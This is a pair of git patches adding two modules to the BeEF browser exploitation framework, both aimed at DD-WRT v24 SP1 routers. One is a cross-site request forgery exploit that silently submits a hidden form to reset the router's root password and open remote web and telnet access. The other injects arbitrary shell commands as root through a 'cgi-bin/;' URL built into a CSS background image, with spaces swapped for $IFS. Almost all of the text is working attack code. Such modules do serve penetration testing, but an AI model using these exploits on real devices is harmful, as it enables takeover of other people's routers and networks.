From fd46915bf2d04375fdd9b2462d1c339a3bf41e17 Mon Sep 17 00:00:00 2001
From: soh_cah_toa <soh_cah_toa@cybercrud.net>
Date: Mon, 16 Jun 2014 09:48:14 -0400
Subject: [PATCH 1/2] Added module for DD-WRT v24 SP1 CSRF vulnerability (issue
 #1006).

---
 .../router/ddwrt_v24_sp1_csrf/command.js      | 57 +++++++++++++++++++
 .../router/ddwrt_v24_sp1_csrf/config.yaml     | 16 ++++++
 .../router/ddwrt_v24_sp1_csrf/module.rb       | 37 ++++++++++++
 3 files changed, 110 insertions(+)
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_csrf/command.js
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_csrf/config.yaml
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_csrf/module.rb

diff --git a/modules/exploits/router/ddwrt_v24_sp1_csrf/command.js b/modules/exploits/router/ddwrt_v24_sp1_csrf/command.js
new file mode 100644
index 000000000..271d6e0f8
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_csrf/command.js
@@ -0,0 +1,57 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+    var host     = '<%= @host %>';
+    var password = '<%= @password %>';
+    var port     = '<%= @port %>';
+    var telnet   = '<%= @telnet %>';
+    var path     = 'apply.cgi';
+
+    if (!host.match(/\/$/))
+        host += '/';
+
+    var ddwrt_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(
+        host + path,
+        'POST', 'application/x-www-form-urlencoded', [
+        { 'type': 'hidden', 'name': 'submit_button', 'value': 'Management' },
+        { 'type': 'hidden', 'name': 'action', 'value': 'ApplyTake' },
+        { 'type': 'hidden', 'name': 'change_action', 'value': '' },
+        { 'type': 'hidden', 'name': 'submit_type', 'value': '' },
+        { 'type': 'hidden', 'name': 'commit', 'value': '1' },
+        { 'type': 'hidden', 'name': 'PasswdModify', 'value': '0' },
+        { 'type': 'hidden', 'name': 'remote_mgt_https', 'value': '' },
+        { 'type': 'hidden', 'name': 'http_enable', 'value': '1' },
+        { 'type': 'hidden', 'name': 'info_passwd', 'value': '0' },
+        { 'type': 'hidden', 'name': 'https_enable', 'value': '' },
+        { 'type': 'hidden', 'name': 'http_username', 'value': 'root' },
+        { 'type': 'hidden', 'name': 'http_passwd', 'value': password },
+        { 'type': 'hidden', 'name': 'http_passwdConfirm', 'value': password },
+        { 'type': 'hidden', 'name': '_http_enable', 'value': '1' },
+        { 'type': 'hidden', 'name': 'refresh_time', 'value': '3' },
+        { 'type': 'hidden', 'name': 'status_auth', 'value': '1' },
+        { 'type': 'hidden', 'name': 'maskmac', 'value': '1' },
+        { 'type': 'hidden', 'name': 'remote_management', 'value': '1' },
+        { 'type': 'hidden', 'name': 'http_wanport', 'value': port },
+        { 'type': 'hidden', 'name': 'remote_mgt_telnet', 'value': '1' },
+        { 'type': 'hidden', 'name': 'telnet_wanport', 'value': telnet },
+        { 'type': 'hidden', 'name': 'boot_wait', 'value': 'on' },
+        { 'type': 'hidden', 'name': 'cron_enable', 'value': '1' },
+        { 'type': 'hidden', 'name': 'cron_jobs', 'value': '' },
+        { 'type': 'hidden', 'name': 'loopback_enable', 'value': '1' },
+        { 'type': 'hidden', 'name': 'nas_enable', 'value': '1' },
+        { 'type': 'hidden', 'name': 'resetbutton_enable', 'value': '1' },
+        { 'type': 'hidden', 'name': 'zebra_enable', 'value': '1' },
+        { 'type': 'hidden', 'name': 'ip_conntrack_max', 'value': '512' },
+        { 'type': 'hidden', 'name': 'ip_conntrack_tcp_timeouts', 'value': '3600' },
+        { 'type': 'hidden', 'name': 'ip_conntrack_udp_timeouts', 'value': '120' },
+        { 'type': 'hidden', 'name': 'overclocking', 'value': '200' }
+    ]);
+
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');
+
+    setTimeout(function() { document.body.removeChild(ddwrt_iframe_<%= @command_id %>) }, 15 * 1000);
+});
diff --git a/modules/exploits/router/ddwrt_v24_sp1_csrf/config.yaml b/modules/exploits/router/ddwrt_v24_sp1_csrf/config.yaml
new file mode 100644
index 000000000..5d7ac9e7a
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_csrf/config.yaml
@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        ddwrt_v24_sp1_csrf:
+            enable: true
+            category: ['Exploits', 'Router']
+            name: 'DD-WRT v24 SP1 CSRF'
+            description: 'Abuses a CSRF vulnerability in DD-WRT v24 SP1 to enable remote
+                administration with a new root password.'
+            authors: ['soh_cah_toa']
+            target:
+                working: ['ALL']
diff --git a/modules/exploits/router/ddwrt_v24_sp1_csrf/module.rb b/modules/exploits/router/ddwrt_v24_sp1_csrf/module.rb
new file mode 100644
index 000000000..5976883bc
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_csrf/module.rb
@@ -0,0 +1,37 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Ddwrt_v24_sp1_csrf < BeEF::Core::Command
+
+    def self.options
+      return [
+        {
+          'name' => 'host',
+          'ui_label' => 'Router web root',
+          'value' => 'http://192.168.1.1/'
+        },
+        {
+          'name' => 'password',
+          'ui_label' => 'Desired password',
+          'value' => '__BeEF__'
+        },
+        {
+          'name' => 'port',
+          'ui_label' => 'Desired web ui port',
+          'value' => '8080'
+        },
+        {
+          'name' => 'telnet',
+          'ui_label' => 'Desired telnet port',
+          'value' => '23'
+        }
+      ]
+    end
+
+    def post_execute
+      save('result' => @datastore['result'])
+    end
+
+end

From f490faa858cff7339f791423785981accd4b2974 Mon Sep 17 00:00:00 2001
From: soh_cah_toa <soh_cah_toa@cybercrud.net>
Date: Mon, 16 Jun 2014 09:56:27 -0400
Subject: [PATCH 2/2] Added module for DD-WRT v24 SP1 RCE vulnerability (issue
 #1006).

---
 .../router/ddwrt_v24_sp1_cmd_exec/command.js  | 26 ++++++++++++++++++
 .../router/ddwrt_v24_sp1_cmd_exec/config.yaml | 18 +++++++++++++
 .../router/ddwrt_v24_sp1_cmd_exec/module.rb   | 27 +++++++++++++++++++
 3 files changed, 71 insertions(+)
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_cmd_exec/command.js
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_cmd_exec/config.yaml
 create mode 100644 modules/exploits/router/ddwrt_v24_sp1_cmd_exec/module.rb

diff --git a/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/command.js b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/command.js
new file mode 100644
index 000000000..cd61a105d
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/command.js
@@ -0,0 +1,26 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+    var host = '<%= @host %>';
+    var cmd  = '<%= @cmd %>';
+    var path = 'cgi-bin/;';
+
+    if (!host.match(/\/$/))
+        host += '/';
+
+    if (cmd.indexOf(' ') != -1)
+        cmd = cmd.replace(/\s+/g, '$IFS');
+
+    // Prevent auth dialog by generating the request via a CSS URL instead of an invisible iframe.
+    var ddwrt_div_<%= @command_id %> = document.createElement('div');
+    ddwrt_div_<%= @command_id %>.setAttribute('style', 'background-image: url("' + host + path + cmd + '")');
+    document.body.appendChild(ddwrt_div_<%= @command_id %>);
+
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');
+
+    setTimeout(function() { document.body.removeChild(ddwrt_div_<%= @command_id %>) }, 15 * 1000);
+});
diff --git a/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/config.yaml b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/config.yaml
new file mode 100644
index 000000000..80323b501
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        ddwrt_v24_sp1_cmd_exec:
+            enable: true
+            category: ['Exploits', 'Router']
+            name: 'DD-WRT v24 SP1 Command Execution'
+            description: 'DD-WRT v24 SP1 fails to properly handle metacharacters in the
+                HTTP management interface. This module abuses that flaw by injecting
+                metacharacters to allow an unauthenticated attacker to execute arbitrary
+                commands as the root user.'
+            authors: ['soh_cah_toa']
+            target:
+                working: ['ALL']
diff --git a/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/module.rb b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/module.rb
new file mode 100644
index 000000000..9cad9bb6d
--- /dev/null
+++ b/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/module.rb
@@ -0,0 +1,27 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Ddwrt_v24_sp1_cmd_exec < BeEF::Core::Command
+
+    def self.options
+      return [
+        {
+          'name' => 'host',
+          'ui_label' => 'Router web root',
+          'value' => 'http://192.168.1.1/'
+        },
+        {
+          'name' => 'cmd',
+          'ui_label' => 'Command',
+          'value' => 'reboot'
+        }
+      ]
+    end
+
+    def post_execute
+      save('result' => @datastore['result'])
+    end
+
+end